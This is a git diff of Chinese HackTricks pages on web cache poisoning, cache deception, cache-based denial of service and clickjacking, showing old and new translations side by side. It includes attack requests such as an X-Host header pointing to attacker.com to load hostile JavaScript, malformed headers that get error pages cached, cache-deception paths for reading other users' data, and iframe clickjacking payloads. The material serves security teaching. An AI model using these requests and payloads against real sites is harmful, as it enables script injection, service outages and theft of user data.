如果你发现 **`X-Host`** 头被用作 **加载 JS 资源的域名**,但响应中的 **`Vary`** 头指示 **`User-Agent`**。那么,你需要找到一种方法来提取受害者的 User-Agent 并使用该用户代理来污染缓存:
```markup
GET / HTTP/1.1
Host: vulnerbale.net
@ -126,7 +129,7 @@ X-Host: attacker.com
```
### Fat Get
使用 URL 和正文中的请求发送 GET 请求。如果 Web 服务器使用正文中的请求,但缓存服务器缓存了来自 URL 的请求,则访问该 URL 的任何人实际上将使用来自正文的参数。就像 James Kettle 在 Github 网站发现的漏洞一样
发送一个带有请求的GET请求URL和主体中都有请求。如果web服务器使用主体中的请求但缓存服务器缓存了URL中的请求那么任何访问该URL的人实际上将使用主体中的参数。就像James Kettle在Github网站上发现的漏洞
```
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
@ -135,99 +138,102 @@ Content-Length: 22
report=innocent-victim
```
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### 参数伪装
例如,在 Ruby 服务器中,可以使用字符 **`;`** 而不是 **`&`** 来分隔 **参数**。这可以用来将非键参数值放入键参数中并滥用它们
例如,在 ruby 服务器中,可以使用字符 **`;`** 来分隔 **参数**,而不是 **`&`**。这可以用来将无键参数值放入有键参数中并加以利用
Portswigger 实验室:[https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
### 利用 HTTP 缓存投毒滥用 HTTP 请求走私
### 通过滥用 HTTP 请求走私来利用 HTTP 缓存中毒
在这里了解如何通过滥用 HTTP 请求走私来执行[利用 HTTP 缓存投毒攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)。
在这里了解如何通过滥用 [HTTP 请求走私进行缓存中毒攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning)。
### Web 缓存投毒的自动化测试
### 自动化测试 Web 缓存中毒
[Web 缓存漏洞扫描器](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)可用于自动测试 Web 缓存投毒。它支持许多不同的技术,并且高度可定制。
[Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) 可用于自动测试 Web 缓存中毒。它支持多种不同的技术,并且高度可定制。
示例用法`wcvs -u example.com`
示例用法: `wcvs -u example.com`
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 可以轻松构建和 **自动化工作流程**,使用全球 **最先进** 的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
## 可能存在漏洞示例
## 漏洞示例
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
ATS 在 URL 中转发了片段而没有剥离它,并仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求 `/#/../?r=javascript:alert(1)` 被发送到后端作为 `/#/../?r=javascript:alert(1)`,缓存键中不包含有效载荷,只有主机、路径和查询。
ATS 在不去除 URL 中的片段的情况下转发了片段,并仅使用主机、路径和查询生成缓存键(忽略片段)。因此,请求 `/#/../?r=javascript:alert(1)` 被发送到后端,作为 `/#/../?r=javascript:alert(1)`,而缓存键中没有负载,仅包含主机、路径和查询。
### GitHub CP-DoS
在内容类型标头中发送错误值会触发 405 缓存响应。缓存键包含了 cookie因此只能攻击未经授权的用户。
在内容类型头中发送错误值触发了 405 缓存响应。缓存键包含 cookie因此只能攻击未认证用户。
### GitLab + GCP CP-DoS
GitLab 使用 GCP 存储静态内容。**GCP 存储桶** 支持 **头部 `x-http-method-override`**。因此,可以发送头部 `x-http-method-override: HEAD`将缓存投毒为返回空响应主体。它还可以支持方法 `PURGE`
GitLab 使用 GCP 存储桶来存储静态内容。**GCP 存储桶** 支持 **头部 `x-http-method-override`**。因此,可以发送头部 `x-http-method-override: HEAD`使缓存中毒以返回空响应体。它还可以支持 `PURGE` 方法
### Rack 中间件Ruby on Rails
### Rack 中间件 (Ruby on Rails)
在 Ruby on Rails 应用程序中,经常使用 Rack 中间件。Rack 代码的目的是获取 **`x-forwarded-scheme`** 头的值并将其设置为请求的方案。当发送`x-forwarded-scheme: http` 时,会发生到同一位置的 301 重定向可能导致对该资源的拒绝服务DoS。此外应用程序可能会识别 `X-forwarded-host` 标头并将用户重定向到指定的主机。这种行为可能导致从攻击者服务器加载 JavaScript 文件,存在安全风险。
在 Ruby on Rails 应用程序中,通常会使用 Rack 中间件。Rack 代码的目的是获取 **`x-forwarded-scheme`** 头的值并将其设置为请求的方案。当发送头 `x-forwarded-scheme: http` 时,会发生 301 重定向到相同位置,可能导致该资源的拒绝服务 (DoS)。此外,应用程序可能会识别 `X-forwarded-host` 头并将用户重定向到指定主机。这种行为可能导致从攻击者的服务器加载 JavaScript 文件,从而带来安全风险。
### 403 和存储桶
Cloudflare 以前缓存 403 响应。尝试使用不正确的授权标头访问 S3 或 Azure 存储 Blob 会导致缓存的 403 响应。尽管 Cloudflare 已停止缓存 403 响应,但这种行为可能仍存在于其他代理服务中。
Cloudflare 之前缓存了 403 响应。尝试使用错误的授权头访问 S3 或 Azure 存储 Blob 会导致 403 响应被缓存。尽管 Cloudflare 已停止缓存 403 响应,但这种行为可能仍存在于其他代理服务中。
### 注入键参数
缓存通常在缓存键中包含特定的 GET 参数。例如Fastly 的 Varnish 在请求中缓存了 `size` 参数。但是,如果还发送了参数的 URL 编码版本(例如,`siz%65`)并附带错误值,缓存键将使用正确的 `size` 参数构建。然而,后端将处理 URL 编码参数中的值。对第二个 `size` 参数进行 URL 编码会导致缓存中省略该参数,但后端会使用它。将此参数赋值为 0 会导致可缓存的 400 Bad Request 错误
缓存通常在缓存键中包含特定的 GET 参数。例如Fastly 的 Varnish 在请求中缓存了 `size` 参数。然而,如果还发送了 URL 编码版本的参数(例如,`siz%65`)并带有错误值,则缓存键将使用正确的 `size` 参数构建。然而,后端将处理 URL 编码参数中的值。对第二个 `size` 参数进行 URL 编码导致缓存省略该参数,但后端使用了它。将该参数的值设置为 0 会导致可缓存的 400 错误请求
### 用户代理规则
一些开发人员阻止与高流量工具(如 FFUF 或 Nuclei匹配的用户代理的请求以管理服务器负载。具有讽刺意味的是,这种方法可能会引入缓存投毒和 DoS 等漏洞
一些开发人员阻止与高流量工具(如 FFUF 或 Nuclei匹配的用户代理的请求以管理服务器负载。讽刺的是,这种方法可能引入漏洞,例如缓存中毒和 DoS
### 非法头字段
### 非法头字段
[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) 指定标头名称中可接受的字符。标头包含指定 **tchar** 范围之外的字符应理想情况下触发 400 Bad Request 响应。实际上,服务器并不总是遵循这一标准。一个值得注意的例子是 Akamai它会转发带有无效字符的标头并缓存任何 400 错误,只要不存在 `cache-control` 标头。发现了一个可利用的模式,发送带有非法字符的标头,例如 `\`,会导致可缓存的 400 Bad Request 错误
[RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) 指定了头名称中可接受的字符。包含超出指定 **tchar** 范围的字符的头应理想地触发 400 错误请求响应。在实践中,服务器并不总是遵循此标准。一个显著的例子是 Akamai它转发包含无效字符的头并缓存任何 400 错误,只要 `cache-control` 头不存在。发现了一种可利用的模式,发送包含非法字符(如 `\`)的头会导致可缓存的 400 错误请求
### 查找新
### 查找新头
[https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
## 缓存欺骗
缓存欺骗的目标是使客户端**加载将由缓存保存的资源及其敏感信息**
缓存欺骗的目标是使客户端 **加载将被缓存保存的敏感信息资源**
首先请注意,例如 `.css`、`.js`、`.png` 等**扩展名**通常被**配置**为**保存**在**缓存**中。因此,如果访问 `www.example.com/profile.php/nonexistent.js`,缓存可能会存储响应,因为它看到 `.js` **扩展名**。但是,如果**应用程序**正在使用存储在 _www.example.com/profile.php_ 中的**敏感**用户内容进行**重放**,您可以从其他用户那里**窃取**这些内容。
首先要注意的是,**扩展名**如 `.css`、`.js`、`.png` 等通常被 **配置****保存****缓存** 中。因此,如果您访问 `www.example.com/profile.php/nonexistent.js`,缓存可能会存储响应,因为它看到 `.js` **扩展名**。但是,如果 **应用程序** 正在 **重放** 存储在 _www.example.com/profile.php_ 中的 **敏感** 用户内容,您可以 **窃取** 其他用户的这些内容。
其他测试内容:
其他测试内容:
* _www.example.com/profile.php/.js_
* _www.example.com/profile.php/.css_
* _www.example.com/profile.php/test.js_
* _www.example.com/profile.php/../test.js_
* _www.example.com/profile.php/%2e%2e/test.js_
* _使用较少人知道的扩展名如_ `.avif`
* _使用不太常见的扩展名如_ `.avif`
另一个非常明显的例子可以在这篇文章中找到:[https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
在这个例子中,解释了如果加载一个不存在的页面,如 _http://www.example.com/home.php/non-existent.css_,将返回 _http://www.example.com/home.php_ 的内容(**带有用户的敏感信息**,并且缓存服务器将保存结果。\
然后,**攻击者**可以在他们自己的浏览器中访问 _http://www.example.com/home.php/non-existent.css_ 并观察之前访问过的用户的**机密信息**。
另一个非常清晰的例子可以在这个报告中找到: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)。\
在这个例子中,解释了如果加载一个不存在的页面,如 _http://www.example.com/home.php/non-existent.css_,将返回 _http://www.example.com/home.php_ **包含用户的敏感信息**)的内容,并且缓存服务器将保存结果。\
然后,**攻击者**可以在自己的浏览器中访问 _http://www.example.com/home.php/non-existent.css_ 并观察之前访问过的用户的 **机密信息**
请注意,**缓存代理**应该根据文件的**扩展名**_.css_而不是根据内容类型来**配置**缓存文件。在示例 _http://www.example.com/home.php/non-existent.css_ 中,将具有 `text/html` 内容类型,而不是预期的 `text/css` MIME 类型(这是 _.css_ 文件的预期类型)。
请注意,**缓存代理** 应该被 **配置****缓存** 文件 **基于** 文件的 **扩展名**_.css_而不是基于内容类型。在示例 _http://www.example.com/home.php/non-existent.css_ 中,将具有 `text/html` 内容类型,而不是 `text/css` MIME 类型(这是 _.css_ 文件的预期类型)。
在这里了解如何进行 [利用 HTTP 请求走私进行缓存欺骗攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)。
在这里了解如何通过滥用 HTTP 请求走私来执行[利用 HTTP 请求走私来执行 Web 缓存欺骗攻击](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception)。
## 自动化工具
* [**toxicache**](https://github.com/xhzeem/toxicache): 用于查找网页缓存投毒漏洞的 Golang 扫描器,可在一组 URL 中测试多种注入技术。
* [**toxicache**](https://github.com/xhzeem/toxicache): Golang 扫描器,用于在 URL 列表中查找 Web 缓存中毒漏洞并测试多种注入技术。
## 参考资料
## 参考文献
* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
@ -239,21 +245,22 @@ Cloudflare 以前缓存 403 响应。尝试使用不正确的授权标头访问
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 可轻松构建并 **自动化** 由全球 **最先进** 社区工具驱动的工作流。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
{% hint style="success" %}
学习和实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客攻击: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# 缓存投毒导致拒绝服务攻击
# Cache Poisoning to DoS
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% hint style="danger" %}
在此页面,您可以找到不同的变体,尝试使**Web服务器以错误响应**对**适用于缓存服务器**的请求进行响应
{% endhint %}
* **HTTP标头超大HHO**
{% hint style="danger" %}
在此页面中,您可以找到不同的变体,以尝试使 **Web 服务器对有效的缓存服务器请求** **响应错误**
{% endhint %}
发送一个带有比Web服务器支持的标头大小更大但比缓存服务器支持的标头大小更小的请求。Web服务器将以400响应进行响应该响应可能会被缓存
* **HTTP Header Oversize (HHO)**
发送一个请求,头部大小大于 Web 服务器支持的大小但小于缓存服务器支持的大小。Web 服务器将以 400 响应进行响应,该响应可能会被缓存:
```
GET / HTTP/1.1
Host: redacted.com
@ -28,23 +29,23 @@ X-Oversize-Hedear:Big-Value-000000000000000
```
* **HTTP Meta Character (HMC) & Unexpected values**
发送一个包含一些**有害的元字符**,如`\n`和`\r`的标头。为了使攻击生效,您必须首先绕过缓存。
发送一个包含一些 **有害元字符** 的头部,例如 `\n``\r`。为了使攻击有效,您必须首先绕过缓存。
```
GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r
```
一个糟糕配置的头可能只是`\:`作为一个标头。
一个配置错误的头可能只是 `\:` 作为头
如果发送了意外的值比如意外的Content-Type:,这也可能起作用。
如果发送了意外的值,这也可能有效,比如意外的 Content-Type:
```
GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld
```
* **未加密的标头**
* **未键入的头部**
一些网站会在请求中看到特定的标头时返回错误状态码,比如 _X-Amz-Website-Location-Redirect: someThing_ 头:
一些网站会在请求中**看到某些特定的头部**时返回错误状态代码,例如带有 _X-Amz-Website-Location-Redirect: someThing_
```
GET /app.js HTTP/2
Host: redacted.com
@ -55,17 +56,17 @@ Cache: hit
Invalid Header
```
* **HTTP方法覆盖攻击HMO**
* **HTTP 方法覆盖攻击 (HMO)**
如果服务器支持使用诸如 `X-HTTP-Method-Override`、`X-HTTP-Method` 或 `X-Method-Override` 等标头更改HTTP方法。可以请求一个有效页面并更改方法以便服务器不支持该方法从而导致缓存了错误的响应
如果服务器支持通过 `X-HTTP-Method-Override`、`X-HTTP-Method` 或 `X-Method-Override` 等头部更改 HTTP 方法,则可以请求一个有效页面,改变方法使得服务器不支持,从而导致错误响应被缓存
```
GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST
```
* **未加密端口**
* **未键入端口**
如果主机头中的端口在响应中反射,但未包含在缓存键中,则可能将其重定向到未使用的端口:
如果主机头中的端口在响应中被反射且未包含在缓存键中,则可以将其重定向到未使用的端口:
```
GET /index.html HTTP/1.1
Host: redacted.com:1
@ -74,9 +75,9 @@ HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss
```
* **长重定向拒绝服务攻击**
* **长重定向 DoS**
就像下面的例子一样x 没有被缓存,因此攻击者可以滥用重定向响应行为,使重定向发送一个如此庞大的 URL 以至于返回错误。然后,尝试访问没有缓存的 x 键的 URL 的人将收到错误响应:
如以下示例所示x 没有被缓存,因此攻击者可以利用重定向响应行为,使重定向发送一个如此大的 URL 以至于返回错误。然后,试图在没有未缓存的 x 密钥的情况下访问该 URL 的人将收到错误响应:
```
GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com
@ -91,9 +92,9 @@ Host: www.cloudflare.com
HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss
```
* **主机头大小写规范化**
* **主机头大小写规范化**
主机头应该是不区分大小写的,但一些网站希望它是小写的,如果不是,则会返回错误:
主机头部应该是不区分大小写的,但某些网站期望它是小写的,如果不是则会返回错误:
```
GET /img.png HTTP/1.1
Host: Cdn.redacted.com
@ -105,7 +106,7 @@ Not Found
```
* **路径规范化**
某些页面会返回错误代码,将数据以 URLencode 的方式发送到路径中,然而,缓存服务器会对路径进行 URLdecode 处理,并将响应存储为 URLdecoded 路径
某些页面在路径中发送数据 URLencode 时会返回错误代码,但缓存服务器会对路径进行 URLdecode 并存储 URLdecoded 路径的响应
```
GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com
@ -118,7 +119,7 @@ Not Found
```
* **Fat Get**
一些缓存服务器,比如Cloudflare或者Web服务器会阻止带有主体的GET请求因此这可能被滥用来缓存一个无效的响应:
一些缓存服务器,如 Cloudflare或 web 服务器,停止带有主体的 GET 请求,因此这可能被滥用来缓存无效响应:
```
GET /index.html HTTP/2
Host: redacted.com
@ -130,21 +131,22 @@ xyz
HTTP/2 403 Forbidden
Cache: hit
```
## 参考资料
## 参考文献
* [https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52](https://anasbetis023.medium.com/dont-trust-the-cache-exposing-web-cache-poisoning-and-deception-vulnerabilities-3a829f221f52)
* [https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post\_page-----3a829f221f52--------------------------------)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,38 +1,39 @@
# 点击劫持
# Clickjacking
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=clickjacking) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %}
## 什么是点击劫持
## 什么是 Clickjacking
点击劫持攻击中,**用户**被**欺骗**点击网页上的一个**元素**,该元素要么是**不可见的**,要么伪装成另一个元素。这种操纵可能会对用户造成意外后果,如下载恶意软件,重定向到恶意网页,提供凭据或敏感信息,转账,或在线购买产品。
clickjacking 攻击中,**用户**被 **欺骗** 点击网页上的一个 **元素**,该元素要么是 **不可见** 的,要么伪装成其他元素。这种操控可能导致用户意想不到的后果,例如下载恶意软件、重定向到恶意网页、提供凭据或敏感信息、资金转移或在线购买产品。
### 预填表单技巧
### 预填表单技巧
有时可以在加载页面时使用GET参数**填充表单字段的值**。攻击者可能会滥用这种行为,填充表单的任意数据并发送点击劫持有效负载,以便用户按下提交按钮。
有时可以在加载页面时使用 GET 参数 **填充表单字段的值**。攻击者可能会利用这种行为用任意数据填充表单并发送 clickjacking 有效载荷,以便用户点击提交按钮。
### 使用拖放填充表单
如果您需要用户**填写表单**,但又不想直接要求他输入某些特定信息(比如您知道的电子邮件或特定密码),您可以要求他**拖放**某些内容,这些内容将写入您控制的数据,就像在[**这个示例**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/)中一样
如果您需要用户 **填写表单**,但不想直接要求他写一些特定信息(例如您知道的电子邮件或特定密码),您可以只要求他 **拖放** 一些将写入您控制数据的内容,如 [**这个例子**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/) 中所示
### 基本有效载荷
```markup
@ -78,7 +79,7 @@ left:210px;
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
```
### 拖放 + 点击攻击载荷
### 拖放 + 点击有效载荷
```markup
<html>
<head>
@ -109,95 +110,97 @@ background: #F00;
```
### XSS + Clickjacking
如果您已经确定了一个需要用户点击某个元素来触发 XSS 攻击的情况,并且页面容易受到点击劫持攻击,您可以利用这一点来欺骗用户点击按钮/链接。\
示例:\
_您发现账户私人详情中存在自身 XSS只有您可以设置和读取的详情。包含设置这些详情的表单的页面容易受到点击劫持攻击您可以使用 GET 参数预填充表单。_\
\_\_攻击者可以准备一个点击劫持攻击到该页面,预填充表单中的 XSS 负载,并欺骗用户提交表单。因此,当表单提交且值被修改时,用户将执行 XSS
如果您已识别出一个**需要用户点击**某个元素以**触发**XSS的**XSS攻击**,并且该页面**易受点击劫持**,您可以利用它来欺骗用户点击按钮/链接。\
示例\
_您在账户的某些私人信息中发现了一个**自我XSS**(这些信息**只有您可以设置和读取**)。包含设置这些信息的**表单**的页面**易受** **点击劫持**您可以用GET参数**预填充**该**表单**。_\
\_\_攻击者可以准备一个**点击劫持**攻击,通过**预填充**该页面的**表单**与**XSS有效载荷**,并**欺骗****用户**提交该表单。因此,**当表单被提交**且值被修改时,**用户将执行XSS**
## 缓解点击劫持的策略
## 减轻点击劫持的策略
### 客户端防御
在客户端执行的脚本可以执行操作以防止点击劫持:
在客户端执行的脚本可以采取措施来防止点击劫持:
* 确保应用窗口是主要或顶级窗口。
* 确保应用程序窗口是主窗口或顶部窗口。
* 使所有框架可见。
* 防止在不可见框架上点击。
